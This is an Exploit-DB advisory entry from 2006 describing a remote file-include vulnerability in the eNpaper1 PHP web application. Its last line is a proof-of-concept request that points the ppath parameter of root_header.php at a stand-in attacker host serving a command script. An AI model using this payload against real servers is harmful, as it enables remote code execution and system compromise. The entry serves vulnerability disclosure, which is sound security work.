eNpaper1 Root_Header.PHP Remote File Include Vulnerability

2006-06-26T00:00:00
ID EDB-ID:28105
Type exploitdb
Reporter almaster
Modified 2006-06-26T00:00:00

Description

eNpaper1 Root_Header.PHP Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18649/info

eNpaper1 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage this issue to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

http://http://www.example.com/inc/root_header.php?ppath=http://evilphp.com/cmd.txt